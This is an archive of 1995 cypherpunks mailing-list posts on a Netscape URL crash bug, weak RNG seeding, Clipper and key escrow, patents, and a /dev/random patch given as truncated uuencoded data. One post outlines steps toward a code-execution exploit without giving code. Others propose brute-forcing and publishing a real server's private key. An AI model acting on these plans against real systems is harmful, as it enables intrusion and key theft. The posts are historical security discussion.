From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: alt@iquest.net (Al Thompson)
Date: Fri, 22 Sep 95 12:10:46 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: The Next Hack
Message-ID: <m0swDUR-00061EC@dorite1.iquest.net>
MIME-Version: 1.0
Content-Type: text/plain


At 05:01 AM 9/22/95 -0400, Futplex wrote:
>sameer writes:
>> 2) Organize a net-wide search over the space of the RNG seed to 
>> crack the private key of some well known secure server.
>> 
>> 3) Release the private key to the net.
>
>FWIW, for the record, I'm uncomfortable with this. It sounds unethical, IMHO.
>
>For me at least, targeting the key of some particular server that happens to
>be out there is over the line.
>
>If you said you would have someone volunteer a supposedly secure server for
>the challenge, I'd have no qualms.
  
I might disagree with the part about releasing it to the net, but I don't
disagree
with targeting a server which is claimed to be "secure."
 
Why?
 
Nobody would have been too upset or surprised if someone had built the
Titanic for the sole purpose of trying to sink it.  It only made waves (pun
alert)
because it was claimed to be "unsinkable" (secure), but sank anyway.
 
Maybe a good tactic would be to crack a "secure" server, and send the results
ONLY to the server operators, along with a description of machine-time involved.
 
Put out a public press release, describing the machine-time involved, how it was
possible due to weak crypto imposed by the government, and the possible
economic and commercial implications of said weak crypto.
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Fri, 22 Sep 95 14:08:40 PDT
To: frenchie@magus.dgsys.com (SysAdmin)
Subject: Re: Another Netscape Bug (and possible security hole)
In-Reply-To: <m0swELB-000xhVC@magus>
Message-ID: <199509222103.OAA02827@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> > 
> >   Not that I want to divert attention away from netscape(OK, maybe I
> > do :-) ), but does this bug exist in any other common browser?
> > 
> > 	--Jeff

	This shows that Netscape will probably, after much bad press
and sleepless nights on the part of netscape developers, become one of
the best secure programs out there.
	The cypherpunks will have won because there will be a secure
program available with the backing of lawyers.
	Netscape will have won because their product will be the best.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lethin@ai.mit.edu (Rich Lethin)
Date: Fri, 22 Sep 95 11:13:25 PDT
To: cypherpunks@toad.com
Subject: Worms and New Netscape Bug
Message-ID: <199509221813.OAA10129@grape-nuts.ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



Although Netscape will certainly fix their new bugs, it's likely that
many old copies will remain on computers on the net, and the holes
will remain.

Netscape could "fight" against this with a modified worms/webcrawler
which looks for blatantly dangerous domain names in URLs and reports
them to "CERT" or blockware companies like Surfwatch.  For example,
they'd find the foo* link at the bottom of 
My page

Not a complete solution obviously (e.g. the server could selectively
reply to requests, and hide from the webcrawler IP).

What happens when someone using the AOL browser clicks on one of these
HREF's... does it crash all of AOL?

---
Concurrent VLSI Arch. Group     545 Technology Sq., Rm. 610
MIT AI Lab                      Cambridge, MA 02139 (617)-253-0972




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Van Wie <dvw@hamachi.epr.com>
Date: Fri, 22 Sep 95 13:19:55 PDT
To: perry <perry@frankenstein.piermont.com>
Subject: Re: Patents and trade secrets was: Encryption algorithms used in PrivaSoft
Message-ID: <306319E6@hamachi>
MIME-Version: 1.0
Content-Type: text/plain



Perry E. Metzger at Sep 22, 95 01:19:37 am wrote:

>David Van Wie writes:
>> It just moves the prior art date from the date of invention to the date
>> of filing the patent application.

>What happens if the chronology goes like this ?
>
>(0) Alice invents a snaffleblort.
>(1) Bob invents a snaffleblort.
>(2) Bob files for a patent on a snaffleblort.
>
>From what you said, it would appear that Alice's prior art won't count when
>it comes to considering the validity of Bob's patent claim. Is that correct 
?

Unless Alice made public statements about her invention, you are right. 
 Something becomes prior art when it is made public.  If she (like most 
patent lawyers will advise) kept her mouth shut about what she had invented 
until her patent application was filed, she would lose under first to file 
rules (assuming step three is that Alice files a patent application).

A quick trip to the soapbox:  First to files rules are good for big 
companies, and bad for small inventors.  Big companies have many lawyers, 
and know exactly how each step of the process works.  Small inventors 
usually don't know the process as well, usually have to scrape together the 
thousands of dollars necessary to pursue a patent, and then find a good 
lawyer that they can trust -- all while ensuring that they don't break one 
of the rules about how you must treat your invention before filing.

Moral: First to invent rules, like "natural copyright," are good for the 
little guy because they base patent decisions on when the important things 
(i.e. invention and reduction to practice) happened, not administrative 
things (i.e. complex documents filed with dotted i's and crossed t's).




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Fri, 22 Sep 95 05:30:42 PDT
To: cypherpunks@toad.com
Subject: Re: Project: a standard cell random number generator
Message-ID: <199509221230.OAA06528@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



These supplement JG's post on CAPSTONE -- which is itself
available with related crypto papers at csrc.ncsl.gov:

------------------

URL: http://csrc.ncsl.nist.gov/nistgen/clip.txt


                CLIPPER CHIP TECHNOLOGY


CLIPPER is an NSA developed, hardware oriented,
cryptographic device that implements a symmetric
encryption/decryption algorithm and a law enforcement
satisfying key escrow system. While the escrow management
system design is not completely designed, the
cryptographic algorithm (SKIPJACK) is completely
specified (and classified SECRET).

The cryptographic algorithm (called CA in this paper) has
the following characteristics:

1.  Symmetric, 80-bit key encryption/decryption
    algorithm;

2.  Similar in function to DES (i.e., basically a 64-bit
    code book transformation that can be used in the
    same four modes of operation as specified for DES in
    FIPS 81);

3.  32 rounds of processing per single encrypt/decrypt
    operation;

4.  Design started by NSA in 1985; evaluation completed
    in 1990.

The CLIPPER CHIP is just one implementation of the CA. 
The CLIPPER CHIP designed for the AT&T commercial secure
voice products has the following characteristics:

1.  Functions specified by NSA; logic designed by
    MYKOTRONX; chip fabricated by VLSI, Inc.: 
    manufactured chip programmed (made unique) by
    MYKOTRONX to security equipment manufacturers
    willing to follow proper security procedures for
    handling and storage of the programmed chip;
    equipment sold to customers;

2.  Resistant to reverse engineering against a very
    sophisticated, well funded adversary;

3.  15-20 MB/S encryption/decryption constant throughout
    once cryptographic synchronization is established
    with distant CLIPPER Chip;

4.  The chip programming equipment writes (one time) the
    following information into a special memory (called
    VROM or VIA-Link) on the chip:

    a.  (unique) serial number
    b.  (unique) unit key
    c.  family key
    d.  specialized control software

5.  Upon generation (or entry) of a session key in the
    chip, the chip performs the following actions:

    a.  Encrypts the 80-bit session key under the unit
        key producing an 80-bit intermediate result;

    b.  Concatenates the 80-bit result with the 25-bit
        serial number and a 23-bit authentication
        pattern (total of 128 bits);

    c.  Enciphers this 128 bits with family key to
        produce a 128-bit cipher block chain called the
        Law Enforcement Field (LEF);

    d.  Transmits the LEF at least once to the intended
        receiving CLIPPER chip;

    e.  The two communicating CLIPPER chips use this
        field together with a random IV to establish
        Cryptographic Synchronization.

6.  Once synchronized, the CLIPPER chips use the session
    key to encrypt/decrypt data in both directions;

7.  The chips can be programmed to not enter secure mode
    if the LEF field has been tampered with (e.g.,
    modified, superencrypted, replaced);

8.  CLIPPER chips will be available from a second source
    in the future;

9.  CLIPPER chips will be modified and upgraded in the
    future;

10. CLIPPER chips presently cost $16.00 (unprogrammed)
    and $26.00 (programmed).

4/30/93

-------------------

URL: http://csrc.ncsl.nist.gov/nistnews/esc_key2.txt


                   February 4, 1994

               AUTHORIZATION PROCEDURES
       FOR RELEASE OF ENCRYPTION KEY COMPONENTS
    IN CONJUNCTION WITH INTERCEPTS PURSUANT TO FISA

The following are the procedures for the release of
escrowed key components in conjunction with lawfully
authorized interception of communications encrypted with
a key-escrow encryption method. These procedures cover
all electronic surveillance conducted pursuant to the
Foreign Intelligence Surveillance Act (FISA), Pub. L.
95-511, which appears at Title 50, U.S. Code, Section
1801 et seq.

1)  In each case there shall be a legal authorization
    for the interception of wire and/or electronic
    communications.

2)  In the event that federal authorities discover
    during the course of any lawfully authorized
    interception that communications encrypted with a
    key-escrow encryption method are being utilized,
    they may obtain a certification from an agency
    authorized to participate in the conduct of the
    interception, or from the Attorney General of the
    United States or designee thereof.  Such
    certification shall

    (a) identify the agency participating in the conduct
        of the interception and the person providing the
        certification;

    (b) certify that necessary legal authorization has
        been obtained to conduct electronic surveillance
        regarding these communications;

    (c) specify the termination date of the period for
        which interception has been authorized;

    (d) identify by docket number or other suitable
        method of specification the source of the
        authorization;

    (e) certify that communications covered by that
        authorization are being encrypted with a
        key-escrow encryption method;

    (f) specify the identifier (ID) number of the
        key-escrow encryption chip providing such
        encryption; and

    (g) specify the serial (ID) number of the key-escrow
        decryption device that will be used by the
        agency participating in the conduct of the
        interception for decryption of the intercepted
        communications.

4)  This certification shall be submitted to each of the
    designated key component escrow agents.  If the
    certification has been provided by an agency
    authorized to participate in the conduct of the
    interception, a copy shall be provided to the
    Department of Justice, Office of Intelligence Policy
    and Review.  As soon as possible, an attorney
    associated with that office shall provide each of
    the key component escrow agents with written
    confirmation of the certification.

5)  Upon receiving the certification, each key component
    escrow agent shall release the necessary key
    component to the agency participating in the conduct
    of the interception.  The key components shall be
    provided in a manner that assures they cannot be
    used other than in conjunction with the lawfully
    authorized electronic surveillance for which they
    were requested.

6)  Each of the key component escrow agents shall retain
    a copy of the certification, as well as the
    subsequent written confirmation of the Department of
    Justice, Office of Intelligence Policy and Review.

7)  Upon, or prior to, completion of the electronic
    surveillance phase of the investigation, the ability
    of the agency participating in the conduct of the
    interception to decrypt intercepted communications
    shall terminate, and such agency may not retain the
    key components.

8)  The Department of Justice shall, in each such case,

    (a) ascertain the existence of authorizations for
        electronic surveillance in cases for which
        escrowed key components have been released;

    (b) ascertain that key components for a particular
        key-escrow encryption chip are being used only
        by an agency authorized to participate in the
        conduct of the interception of communications
        encrypted with that chip; and

    (c) ascertain that, no later than the completion of
        the electronic surveillance phase of the
        investigation, the ability of the agency
        participating in the conduct of the interception
        to decrypt intercepted communications is
        terminated.

9) Reports to the House Permanent Select Committee on
    Intelligence and the Senate Select Committee on    
    Intelligence, pursuant to Section 108 of FISA,
    shall, with respect to any order for authorized
    electronic surveillance for which escrowed
    encryption components were released and used for
    decryption, specifically note that fact.

These procedures do not create, and are not intended to
create, any substantive rights for individuals
intercepted through electronic surveillance, and
noncompliance with these procedures shall not provide the
basis for any motion to suppress or other objection to
the introduction of electronic surveillance evidence
lawfully acquired.

------------------












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James Caldwell" <jcaldwel@iquest.net>
Date: Mon, 2 Oct 95 14:19:47 PDT
To: cypherpunks@toad.com
Subject: Re: The Free Speech Implications of Remailers
Message-ID: <m0szsEa-0003M8C@dorite1.iquest.net>
MIME-Version: 1.0
Content-Type: text/plain


On  1 Oct 95 at 22:32, Timothy C. May wrote:

> Crypto anarchy means the racists, sexists, speciesists, and other
> "ists" cannot be muzzled. I call this a good thing. It's why I'm
> here.

I don't mind the mail, it's in a bit bucket, just the cowardly nature 
of it. It was not sent anonymously which can be filtered.

I appologize for spamming the list in response to hi message, it 
upset me.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Fri, 22 Sep 95 12:27:31 PDT
To: perry@piermont.com
Subject: Re: Another Netscape Bug (and possible security hole)
In-Reply-To: <199509221243.IAA03781@frankenstein.piermont.com>
Message-ID: <199509221927.PAA16372@homeport.org>
MIME-Version: 1.0
Content-Type: text/plain


Perry E. Metzger wrote:

| I don't believe the Sun Java stuff would suffer from it, although I
| fear Java a great deal.

	I keep hearing this thought.  Isn't Win95 with its
'executables in email' much more dangerous than Java, which at least
tries to address security?

	There is the argument that the claims will inspire false
confidence in Java's security mechanisms, and thus people will be
bitten, but I don't buy it.  People don't look to security as a chack
item when buying software.  And when they do, they're usually not
capable of distinguishing between the pap that passes for security
through marketing from security by design.

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Fri, 22 Sep 95 12:46:37 PDT
To: cypherpunks@toad.com
Subject: Re: The Next Hack
Message-ID: <199509221944.PAA06418@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199509211832.LAA24086@infinity.c2.org>, sameer@c2.org (sameer)
wrote:

>Proposal for action:
>
>1) Reverse-engineer a server to see if the keygen phase uses
>a weak RNG seed. -- if so, determine the exact algorithim.
>
>2) Organize a net-wide search over the space of the RNG seed to 
>crack the private key of some well known secure server.
>
>3) Release the private key to the net.

Count me in. Let's start with Netscape's own.

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMGMSJSoZzwIn1bdtAQFqiwF+IZKDv1t5Q2va2yE2JZMCHGITkxoDHHML
alvjYK+XyxPNaVGgRgMk5gTsZMcHqBvz
=meVk
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dmandl@panix.com
Date: Fri, 22 Sep 95 12:47:17 PDT
To: Adam Shostack <adam@lighthouse.homeport.org>
Subject: Re: Another Netscape Bug (and possible security hole)
In-Reply-To: <199509221927.PAA16372@homeport.org>
Message-ID: <Pine.SUN.3.91.950922154119.7388A-100000@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 22 Sep 1995, Adam Shostack wrote:

> Perry E. Metzger wrote:
> 
> | I don't believe the Sun Java stuff would suffer from it, although I
> | fear Java a great deal.
> 
> 	I keep hearing this thought.  Isn't Win95 with its
> 'executables in email' much more dangerous than Java, which at least
> tries to address security?

Is that the new MS-Word you're thinking of?  I hear that it lets you
imbed macros containing executable code in documents.  That's got to
be one of the most dangerous ideas ever cooked up.

   --Dave.

--
Dave Mandl
dmandl@panix.com
http://wfmu.org/~davem




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael Elkins" <elkins@zzyzx.aero.org>
Date: Fri, 22 Sep 95 16:01:15 PDT
To: cypherpunks@toad.com
Subject: Re: Another Netscape Bug (and possible security hole)
In-Reply-To: <199509222051.NAA10687@ix.ix.netcom.com>
Message-ID: <95Sep22.160107pdt.111128-3@aero.org>
MIME-Version: 1.0
Content-Type: application/pgp

PGP message


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frenchie@magus.dgsys.com (SysAdmin)
Date: Fri, 22 Sep 95 13:04:54 PDT
To: jsw@neon.netscape.com (Jeff Weinstein)
Subject: Re: Another Netscape Bug (and possible security hole)
In-Reply-To: <43tpv8$rom@tera.mcom.com>
Message-ID: <m0swELB-000xhVC@magus>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

While browsing my mail I noticed that Jeff Weinstein wrote:
> 
>   OK, Perry was right, and it was wrong of me to argue with him based
> only on the code that I have personally seen.  As we have already
> determined, I have not reviewed every line of code in netscape.
> 
>   Not that I want to divert attention away from netscape(OK, maybe I
> do :-) ), but does this bug exist in any other common browser?
> 
> 	--Jeff
> 
> -- 
> Jeff Weinstein - Electronic Munitions Specialist
> Netscape Communication Corporation
> jsw@netscape.com - http://home.netscape.com/people/jsw
> Any opinions expressed above are mine.
 

TkWWW under Linux 1.2.12 dies with a Segmentation Fault
with this bug :(


- -- 
=====================PGP Encrypted Mail Preferred========================
       PGP Public Keys: 1024/BEB3ED71 & 2047/D9E1F2E9 on request. 
           As soon as any man says of the affairs of the state 
    " What does it matter to me? " the state may be given up for lost.
                    J.J.Rousseau - The Social Contract
GAT/E/O d++@>- H--- s: a29 C+++$ UL++++($) P+>+++ L++>++++ E W+++ N++ K- 
w---- O- M- V-- PS+ PE++ Y+ PGP+++ t 5+ X R* tv b++ DI++ D++ G++ e h+ r 
y++ [Geek Code v3.0] a.k.a [ root@magus.dgsys.com / vamagus@delphi.com]
==========================================================================

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAgUBMGMWyLbmxeO+s+1xAQEa4gP8DLVEoZwrVtqMpztIrCH6sSAdEoUZf3jU
c2AgSNwvqv4/CbGeTxZ7UBFO4hjbUJPlmvwfY0J6yAfsKnYvSxKL55VtbAQzSuac
2KjUSIUh23wpe9hpJaURpK8NM6tlDs2GsoVmdIRL1wFpdwurAeijH1JhSqrJFdKN
b+/jeyTw9+0=
=7ZJq
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Fri, 22 Sep 95 13:19:13 PDT
To: cman@communities.com (Douglas Barnes)
Subject: Re: Another Netscape Bug (and possible security hole)
In-Reply-To: <v02120d01ac88cf556dd4@[199.2.22.120]>
Message-ID: <199509222018.QAA11163@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> 
> Spent too much time last night playing with the Netscape bug;
> among other things wrote some code to throw various random binary
> URLs at Netscape. Netscape seems prepared to swallow the bait
> as long as the URL does _not_ contain characters screened as
> follows:
> 
>  if ((c != '"') && (c!='>') && (c!=0) && (c!='/') ) {
> 
> This means you can't plant 0x00, 0x22, 0x3e or 0x2f.

   Did you check 0x20 and 0xa0?  (space and shift-space) I'm sure
that a space will terminate the href in <a>.

   I've been playing around with Netscape today and I achieved two
things. First, I've isolated a routine very near to where it crashes
(if I set a breakpoint in GDB, it only hits the breakpoint when a domain
is looked up by any method) Secondly, even without disassembly I've been
able to place an exact value in the PC register (0x61616161). Now,
all that's left is to 1) find out where the stack pointer is,
2) make the PC point to some area near the stack pointer, and 3)
create some code which does a syscall on execve with "xterm" as
the argument, with the restriction that it cannot contain any of the
above illegal codes. #3 is the hardest for me since I've never done
assembly under BSDI but I assume it's some sort of trap call I need
to do.

  Once all that is done, just package it up into a URL and you are set
to wreak havoc.

  If someone else exploits the hole before I do, I would urge you not to
reveal the exact implementation to any mailing lists for the simple
reason that even a benign exploitation can be easily modified to be
dangerous. Security through obscurity, I know,  but think about it.
Once you have the URL,  anyone can exploit the bug by pasting it into
their home page. And with the way the net works, this would probably
seem "cool" to most people and it would spread like wildfire. If
you don't reveal the implementation, then perhaps that will buy enough
time for most users to upgrade to Netscape 2.0 before crackers start
exploiting it.

[this bug is far more dangerous than the RNG bug or the 40-bit crypto]

-Ray




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Fri, 22 Sep 95 13:19:43 PDT
To: dmandl@panix.com
Subject: Re: Another Netscape Bug (and possible security hole)
In-Reply-To: <Pine.SUN.3.91.950922154119.7388A-100000@panix.com>
Message-ID: <199509222019.QAA16468@homeport.org>
MIME-Version: 1.0
Content-Type: text/plain


dmandl@panix.com wrote:
| On Fri, 22 Sep 1995, Adam Shostack wrote:

| > 	I keep hearing this thought.  Isn't Win95 with its
| > 'executables in email' much more dangerous than Java, which at least
| > tries to address security?
| 
| Is that the new MS-Word you're thinking of?  I hear that it lets you
| imbed macros containing executable code in documents.  That's got to
| be one of the most dangerous ideas ever cooked up.

	No, this is a seperate problem.  Its not auto-executing code
in Microsoft documents that worries me, so much as the ability to
include executables as clickable images in a mail message, with the
user having no control over what environment the program executes in.

	If strong fences make good neighbors, where are the fences in
my network neighborhood?

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Theodore Ts'o <tytso@MIT.EDU>
Date: Fri, 22 Sep 95 13:40:17 PDT
To: perry@piermont.com
Subject: Re: /dev/random for Linux
In-Reply-To: <199509210349.XAA06110@frankenstein.piermont.com>
Message-ID: <9509222039.AA25206@dcl.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain


   > > On this same track, I suggest that "/dev/random" devices for unix are
   > > an excellent idea. Ted Tso did one for Linux that steals all the bits
   > > of semi-random timing information it can.
   >
   > Anyone know where I can find more information on this wonderful device?

I've just sent patches (versus the Linux 1.3.28 kernel) off to Linus.
There's a fairly long exposition at the beginning of
drivers/char/random.c which explain its theory of operation.

There are some things that I had wanted to do to make it better; for
example, not use MD5 in the inner bucket-mixing, but use a CRC-based
mixing algorithm that Colin had suggested; this should be much faster,
and since I'm using MD5 on the output side of the random number
generator, it should be good enough.  Also, at some point I want to add
code so that it can sample the Pentium instruction cycle clock register,
which will give us a much finer granularity clock with which to measure
events.

However, given the current interest in random number generators ---
thank you Netscape for providing such a wonderful object lession!  :-) ---
and keeping in mind the saying that the best is often the enemy of the
good, I've decided to make what I have available now, and worry about
improving it later.

In any case, here it is.  With any luck, it'll be included in the 1.3.29
Linux kernel; the idea is that application programs running under Linux
should be able to assume that /dev/random exists and that they can rely
on it.  Perhaps if enough free OS's do this, commercial OS vendors will
get shamed into providing /dev/random on their Unix systems.  Or better
yet, perhaps hardware vendors will decide it's worth including the $10
(if that) worth of parts necessary to have a real, hardware-based random
number generator in their machines.

If there are any representatives from such computer manufacturers,
please consider this a hint.  :-)

						- Ted

begin 644 patches.random.gz
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
